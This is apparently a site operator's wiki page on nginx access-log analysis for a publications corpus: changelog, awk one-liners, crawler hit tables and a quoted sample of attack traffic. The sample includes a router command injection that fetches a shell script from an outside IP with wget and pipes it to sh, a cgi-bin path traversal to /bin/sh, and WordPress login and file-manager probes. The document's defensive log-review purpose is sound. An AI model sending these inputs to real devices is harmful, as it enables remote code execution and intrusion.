metadata (Normative)

Title:

Publications Access Graphs

Author:

Ralph B. Holland

version:

1.11.0

Publication Date:

2026-01-30T01:55Z

Updates:

2026-03-12T22:51Z	1.11.0	-	removed some graphs
2026-03-10T01:52Z	1.10.0	-	graphs
2026-03-09T07:01Z	1.9.0	-	fixed the semantic error in human-anon access graphlet, introduced human-ai, human-bot, human-machine lifecycle graphs
2026-03-08T20:43Z	1.8.3	-	updated graphs and projections description
2026-03-06T21:40Z	1.8.1	-	updated graphs
2026-03-04T22:21Z	1.8.0	-	modified invariants to include Main Page and Category:Cognitive Memoisation in projections.
2026-03-03T20:19Z	1.7.1	-	graphs
2026-03-02T10:25Z	1.7.0	-	altered access.py to work with buckets and calc MA based on days
2026-02-27T10:21Z	1.6.0	-	now use and included deterministic code to project graphs due to massive problems with models honouring invariants
2026-02-27T15:06Z	1.5.0	-	Included Python code because the model ignores invariants.
2026-02-23T21:46Z	1.4.0	-	modification to logrollup to modify <dir>-<metadata> carrier and also provide parallel metadata buckets.
2026-02-09T10:24Z	1.3.3	-	included another access life cycle projection
2026-02-07T07:49Z	1.3.2	-	refinements to GP-01 and included LG-0a.
2026-02-07T07:17Z	1.3.1	-	elevated LG-0 to GP-0
2026-02-07T07:05Z	1.3.0	-	included LG-0 to define up, down, left and right!
2026-02-06T00:00Z	1.2.0	-	partial update of projections
2026-02-03T13:39Z	1.1.0	-	separated out metadata access from Get. Various updates will appear within date-range sections because this document is live edited
2026-01-29T22:28Z	0.0.0	-	concept.

Affiliation:

Arising Technology Systems Pty Ltd

Contact:

ralph.b.holland [at] gmail.com

Provenance:

This is a curation artefact

Status:

temporal ongoing updates expected

The metadata table immediately preceding is CM-defined and constitutes the authoritative provenance record for this artefact.

All fields in that table (including artefact, author, version, date and reason) MUST be treated as normative metadata.

The assisting system MUST NOT infer, normalise, reinterpret, duplicate, or rewrite these fields. If any field is missing, unclear, or later superseded, the change MUST be made explicitly by the human and recorded via version update, not inferred.

As curator and author, I apply the Apache License, Version 2.0, at publication to permit reuse and implementation while preventing enclosure or patent capture. This licensing action does not revise, reinterpret, or supersede any normative content herein.

Authority remains explicitly human; no implementation, system, or platform may assert epistemic authority by virtue of this license. (2025-12-18 version 1.0 - See the Main Page)

Publications access graphs

Scope

This is a collection of normatives and projections used to evaluate page interest and efficacy. The corpus is maintained as a corrigable set of publications, where there are lead-in and foundations of the work. These lead-ins are easily seen in the projections. A great number of hits are from AI bots and web-bots (only those I permit) and those accesses have overwhelmed the mediawiki page hit counters. Thus these projections filter out all that noise.

I felt that users of the corpus may find these projections as an honest way of looking at the live corpus page landing/update (outside of Zenodo views and downloads). All public publications on the mediawiki may be viewed via category:public.

Sometime the curator will want all nginx virtual servers and will supply a rollups.tgz for the whole web-farm, and othertimes they will supply a rollup that is already filtered by publications.arising.com.au. The model is NOT required to perform virtual server filtering.

Projections

Rollups capture starts from 2025-12-23.

Projections include:

page access lifetime graphlets
page total accumulated hits by access category: human_get, metadata, ai, bot and bad-bot (new 2025-01-03)
accumulated human_get times series
page_category scatter plot

In Appendix A there are one set of general invariants used for projections, followed by invariants for specific projections with:

Corpus membership constraints apply ONLY to the accumulated human_get time series.
The daily hits scatter is NOT restricted to corpus titles.
Main_Page is excluded from the accumulated human_get projection, but not the scatter plot - this is intentional

The projection data were acquired by logrollup of nginx access logs.

The logrollup program in is Appendix B - logrollup and it now contains a metadata bucket for anopn/metadata access, which is by far the predomionant corpus traffic (bots masquerading and presenting as web-browsers).

Appendix C - provides the Access Lifetime invariants.

Appendix D - page_list-verify produces aggregation for verification of the scatter plot and time series. In its own right with the additional categories included it is quite an insightful projection.

The access is assumed to be human-centric when agents cannot be identified, and when the access is a real page access and not to metadata. With identified robots and AI being relegated to non-human categories. The Bad Bot category covers any purposefully excluded Bot from the web-server farm via nginx filtering. The human category also contains un-identified agents - because there is no definitive way to know that any access is really human. The rollups were verified against temporal nginx log analysis and the characterisation between bot and human is fairly indicative. The metadata access is assumed to be from an agent since humans normally do not crawl through metadata links.

The accumulative page time series count is from 2025-12-25 and has been filtered for pages from the Corpus, while the Scatter Plot is an aggregation across the entire period and categorised by agent, method and status code, and only excludes noise-type access - so this projection includes all publication papers that may be of interest (even those outside the corpus).

I introduced the deterministic page_list_verify and the extra human_get bar graph for each page as a verification step. It is obvious that the model is having projection difficulties, seemingly unable to follow the normative sections for projection. I have tried many ways to reconcile the output so I can now normatively assert the upper bounds with the latest deterministic code.

Revised Projections

2026-06-12

2026-06-10

2026-06-09

metadata accessors

There are many automated systems scraping the web.

ralph@padme:~/AI$ ./sample nginx-logs.tgz

Tooling

I have weird agents attacking my farm. The following script is useful to see the top 50 agents.

to find attacks across the farm

awk -F\" '$6=="-" || $6=="" {print $8 " | " $2 " | " $6}' access.log | sort | uniq -c | sort -nr | head -50

loading PDF

awk -F\" '$2 ~ /\.pdf/ {print $8 " | " $2 " | " $6}' access.log | sort | uniq -c | sort -nr | head -50

check site wide

awk -F\" '$6=="-" || $6=="" {print $8 " | " $2}' access.log | sort | uniq -c | sort -nr | head -50

This is a sample of the type of attacks:

awk -F\" '$6=="-" || $6=="" {print $8 " | " $2}' access.log | sort | uniq -c | sort -nr | head -50

    178 xxx.com.au | GET / HTTP/1.1
    178 xxx.com.au | GET /wiki/Main_Page HTTP/1.1
    178 xxx.com.au | GET / HTTP/1.1
    153 xxx.com.au | GET /family/Reverend_Bruce_Holland_tribute HTTP/1.1
     10 xxx.com.au | GET / HTTP/1.1
      4 xxx.com.au | PROPFIND / HTTP/1.1
      4 xxx.com.au | GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1
      2 xxx.com.au | POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
      2 xxx.com.aucom.au | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
      2 xxx.com.au| GET /wp9.php HTTP/1.1
      2 xxx.com.au | GET /path.php HTTP/1.1
      2 xxx.com.au | GET /ms-edit.php HTTP/1.1
      1 xxx.com.au | GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1
      1 xxx.com.au | \x00\x0E8\xDA\xF2\x00\xD4q\x9E<U\x00\x00\x00\x00\x00
      1 xxx.com.au | \x00\x0E8\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00
      1 xxx.com.au | \x00\x07\x06\x1A\x1A\x03\x04\x03\x03\x00\x12\x00\x00\x00\x10\x00\x0E\x00\x0C\x02h2\x08http/1.1\x00\x1B\x00\x03\x02\x00\x02\x00\x17\x00\x00\xFE
      1 xxx.com.au | SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1
      1 xxx.com.au | MGLNDD_203.217.61.13_443
      1 xxx.com.au | 'GET / HTTP/1.1
      1 xxx.com.au | \x16\x03\x02\x01o\x01\x00\x01k\x03\x02RH\xC5\x1A#\xF7:N\xDF\xE2\xB4\x82/\xFF\x09T\x9F\xA7\xC4y\xB0h\xC6\x13\x8C\xA4\x1C=\x22\xE1\x1A\x98 \x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=':\xA9\x82\xD9o\xC8\xA2\xD7\x93\x98\xB4\xEF\x80\xE5\xB9\x90\x00(\xC0
      1 xxx.com.au | \x16\x03\x01\x00\xF2\x01\x00\x00\xEE\x03\x03\xDE\x11Qk[KpN\x9E\xBD\x98I[\xF8\x7F\xA9\xFC{\xD8\xB6\xBE\x0C\x9A4ptu\xCC\xF2\x88!7 T\x7F\x9Aw\xFAeT\x1B#\xA3?\xCA\xFEoqGM\xC9V5\xA1\xF1\xAD\xB7\xF5\xDD\xB7\x22\xF7k
      1 xxx.com.au | \x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xBE)\xDFj\xAD\xC5\x0B\xD0\xB9\x88L\xAB\xD0\x0F\x22\xBC\x0C5\x94\xDB\xCAZ\x8A\xF2}t/\xAB\x9D\xB1\x836 \xC4\xAA\xF4\x1B\xD5\xF7<\xFB\xDDO\xCA\xF3\xB6\x91\xC7R\xB6Fh\xCE]\xD1\x90`\xA7\x19\xD9\x00\xD9\x8F\xBA\xE5\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
      1 xxx.com.au | \x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x80,\x1C\xF0\xEA\xE7\xF3W\xBD\x7F7\xDEp\xAC\xFCPHZ\x14\xCB^!\x06\x1A\xF9m/r1V\x86\x94 ;\x058\xC6\xF7\x84\xA5\xC5\x9C
      1 xxx.com.au | \x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x12z\xDF\x86\xB1\xE9\xE7\x02?/e\xB4x-\x1ES\xF2A\xD6\x22\x94\xB7\x96\x7F-\xC8\xE2\xA3\xC0\xD9\x00\x86 <\xF8\xD9\xCCM%\xFA@\xEE\xD6\x8D~\xD8A^\x88\x0B\x06&a:\x16)\x08\xC43\x9A\xDE\xA7\x8Ct)\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
      1 xxx.com.au | \x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03[\xB4i\xAA/\x18}\x11\xD1\xE0\x94U\xB4\xE7\xC5:QI\x97\xC8\xE9/y)\x87\xC4\xDA\xAF>\x0F\xC1\xF0\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0'\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
      1 xxx.com.au | \x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03'7\xE9\xB27p\x06\x96\xEA\xC6\xE3\xCC
      1 xxx.com.au | \x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
      1 bxxx.com.au | \x00\x0E8\x95z\xAA\x1C\xB2+\xF4Z\x00\x00\x00\x00\x00
      1 xxx.com.au| t3 12.1.2

general top access

root@padme:/var/log/nginx#  awk -F\" '{print $8 " | " $2 " | " $6}' access.log | sort | uniq -c | sort -nr | head -50
    956 f.com.au | HEAD / HTTP/1.1 | curl/7.88.1
    956 c.com.au | HEAD / HTTP/1.1 | curl/7.88.1
    956 w.com.au | HEAD / HTTP/1.1 | curl/7.88.1
    190 y.com.au | HEAD / HTTP/1.1 | curl/7.81.0
    178 w.com.au | GET / HTTP/1.1 | -
    178 ww..com.au | GET /wiki/Main_Page HTTP/1.1 | -
    178 ww.com.au | GET / HTTP/1.1 | -
    153 f.com.au | GET /family/Reverend_Bruce_Holland_tribute HTTP/1.1 | -
     56 p.com.au | POST /pub-dir/api.php HTTP/2.0 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
     56 c.com.au | POST /update/picture.cgi HTTP/2.0 | Mozilla/5.0 zgrab/0.x
     50 pad.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15
     48 r.org | GET /rt/Training_Outreach HTTP/2.0 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot
     48 r.org | GET / HTTP/2.0 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot
     46 r.org | GET /favicon.ico HTTP/2.0 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
     40 pad.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
     34 pad.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
     32 f.com.au | GET /family/Reverend_Bruce_Holland_tribute HTTP/1.1 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
     28 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
     26 p.com.au | GET /pub-dir/images/0/03/Part_91_Plain_English_Guide.pdf HTTP/2.0 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot
     23 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
     22 w.com.au | GET /favicon.ico HTTP/2.0 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
     22 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
     22 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
     21 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:120.0) Gecko/20100101 Firefox/120.0
     19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
     19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
     19 padme.arising.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
     19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0
     19 padme.arising.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
     19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
     19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
     18 p.com.au | GET /pub-dir/load.php?lang=en-gb&modules=site.styles&only=styles&skin=vector-2022 HTTP/2.0 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
     18 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
     18 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
     18 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
     17 pad.com.au | POST /wp-login.pme.arisinghp HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0
     17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
     17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
     17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
     17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:118.0) Gecko/20100101 Firefox/118.0
     17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
     16 p.com.au | GET /pub-dir/load.php?lang=en-gb&modules=startup&only=scripts&raw=1&skin=vector-2022 HTTP/2.0 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
     16 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:119.0) Gecko/20100101 Firefox/119.0
     16 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
     15 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
     15 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
     14 w.com.au | GET /robots.txt HTTP/1.1 | Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)
     14 p.com.au | GET /robots.txt HTTP/2.0 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
     14 p.com.au | GET /pub/Publications_Access_Graphs HTTP/2.0 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
     14 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

Summary (Sampled Log Windows with Infrastructure Event)

Class	2025-12-27	2025-12-28	2025-12-30	2026-01-03	2026-01-10	2026-01-22	2026-01-30	2026-02-04	2026-02-11	2026-02-20	2026-02-28	2026-03-03	2026-03-04	2026-03-05	2026-03-06	2026-03-07	2026-03-08	2026-03-09	2026-03-10	2026-03-11	2026-03-12	2026-03-13
Bytes	797060581	1775268742	964590593	1535680600	1196666216	1946354694	1972512052	3889575239	1435222777	1304762776	1113973398	605571945	1133432762	608526905	410444255	603790891	674927635	822446879	1147557674	3230976394	4724439305	391811411
Total Hits	17104	24709	23655	25051	22652	26792	20092	22713	35298	21912	31625	15803	27101	21095	21969	18606	20393	22113	23295	53543	36938	6254
Rate MiB/h	31.7	70.5	38.3	61.0	47.6	77.3	78.4	154.6	57.0	51.8	44.3	24.1	45.0	24.2	16.3	24.0	26.8	32.7	45.6	128.4	187.7	15.6
Average kiB/hit	45.5	70.2	39.8	59.9	51.6	70.9	95.9	167.2	39.7	58.1	34.4	37.4	40.8	28.2	18.2	31.7	32.3	36.3	48.1	58.9	124.9	61.2
Local Access	0	2232	1685	1626	2259	1117	2157	1695	36	1670	8436	2997	6659	1839	1304	1930	3870	5421	6545	1014	820	0
Human/Anon/Page	9510	11039	9973	11277	9776	11862	9201	6300	9398	6452	7254	3769	6076	5395	5676	6264	6192	5455	6047	5866	5942	1372
Anon/Metadata	1180	2690	646	3144	1010	1085	2232	1903	3562	4465	3439	2420	4603	3857	4878	3881	4041	3833	4742	5445	4018	1489
Other	4531	3929	4688	6081	4678	7408	3187	2688	5746	6848	9791	5246	7856	8050	8619	4440	4934	5342	4277	9208	4439	1912
Bad Bot	1391	1198	6275	2055	3144	709	1032	1384	696	748	573	285	522	560	503	462	504	482	487	327	301	32
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)	93	3171	3	8	149	6	109	7745	14490	770	163	608	26	65	0	853	54	827	0	39	16368	1199
meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)	2	4	3	7	2	1	2	3	30	11	5	0	34	79	10	9	11	6	2	29895	3917	1
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)	0	4	1	0	1110	738	1597	295	19	224	1180	0	752	555	514	282	315	70	659	801	333	82
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; PerplexityBot/1.0; +https://perplexity.ai/perplexitybot)	0	0	0	0	0	3306	0	1	2	2	4	5	0	0	0	2	0	1	2	82	8	0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36	3	17	19	15	5	152	151	151	168	93	161	77	91	69	64	105	101	96	106	104	139	21
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot	44	34	52	55	82	66	70	75	103	53	68	140	128	77	84	73	45	89	111	231	141	31
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot	124	161	123	259	111	76	80	116	330	48	49	30	32	51	20	32	8	28	24	22	59	4
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36	0	0	0	0	6	4	4	4	227	182	179	7	9	197	10	4	3	64	8	11	105	1
Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)	13	17	16	12	16	24	22	25	70	19	25	30	36	34	36	30	40	34	28	42	35	10
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)	20	33	27	47	25	39	19	27	23	26	25	24	32	29	25	31	33	28	31	34	17	19
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)	0	0	0	0	0	0	0	0	39	52	72	31	62	68	52	52	105	58	8	0	0	0
Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)	2	0	0	6	1	0	18	3	21	32	21	18	56	35	52	17	32	187	11	40	20	3
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)	34	56	35	294	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)	14	0	1	5	18	12	5	0	38	89	43	3	5	8	11	12	7	10	3	84	17	2
Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)	31	46	37	23	21	21	30	21	56	40	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)	0	0	0	0	119	52	94	27	5	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)	0	0	0	0	0	0	0	0	0	0	3	0	2	3	4	7	2	0	66	79	69	32
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot	12	12	11	11	12	14	14	14	14	12	12	11	5	14	14	11	15	9	15	15	17	2
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot	4	1	2	7	5	2	4	77	106	0	0	31	9	14	0	0	0	0	0	0	0	0
Googlebot-Image/1.0	9	10	4	69	14	10	15	8	12	4	8	4	10	13	4	10	5	1	6	10	10	0
Mozilla/5.0 (compatible; MJ12bot/v2.0.5; http://mj12bot.com/)	0	0	0	0	0	0	0	0	0	0	17	16	26	14	11	19	22	15	17	21	27	2
Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)	7	1	1	1	3	3	3	7	4	3	9	4	12	16	14	9	15	22	15	20	21	5
Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)	4	5	2	8	7	4	1	15	18	22	20	0	0	3	1	2	1	1	0	8	20	21
Googlebot/2.1 (+http://www.google.com/bot.html)	6	7	6	7	5	7	6	27	6	7	6	4	5	7	7	4	8	0	9	5	16	1
DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)	4	2	3	0	6	4	0	8	8	3	4	10	20	9	7	14	0	15	13	7	11	4
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0	0	0	0	0	0	0	0	0	0	0	4	0	4	4	4	2	2	0	6	84	6	0
Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)	10	16	4	4	4	0	0	6	6	0	3	3	2	4	2	7	2	2	3	21	2	2
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)	0	0	0	0	0	0	0	58	18	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)	0	0	16	5	0	5	0	8	10	2	0	0	1	2	2	0	1	1	1	2	2	1
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)	1	0	1	7	1	11	1	1	3	1	3	0	6	4	4	2	2	3	2	0	2	0
Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)	2	0	0	4	3	0	0	2	10	0	1	4	0	2	3	4	0	2	5	4	3	0
Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)	0	0	0	0	0	0	0	0	0	0	0	0	0	0	22	0	0	2	0	0	22	0
Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)	9	0	0	0	0	13	9	0	0	0	0	0	5	0	0	0	0	0	4	0	0	0
Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)	4	2	0	0	13	0	4	0	0	8	1	1	4	2	1	0	0	0	0	0	0	0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)	0	0	0	0	33	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)	0	0	0	0	0	0	0	0	0	0	2	0	0	0	0	0	0	1	21	3	3	0
Mozilla/5.0 (compatible; crawler)	1	0	0	0	0	0	0	0	12	5	8	0	0	0	0	0	0	0	0	1	0	2
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)	0	13	10	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	1
Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)	0	0	0	3	1	4	0	0	0	2	2	1	2	0	0	2	2	0	0	2	2	0
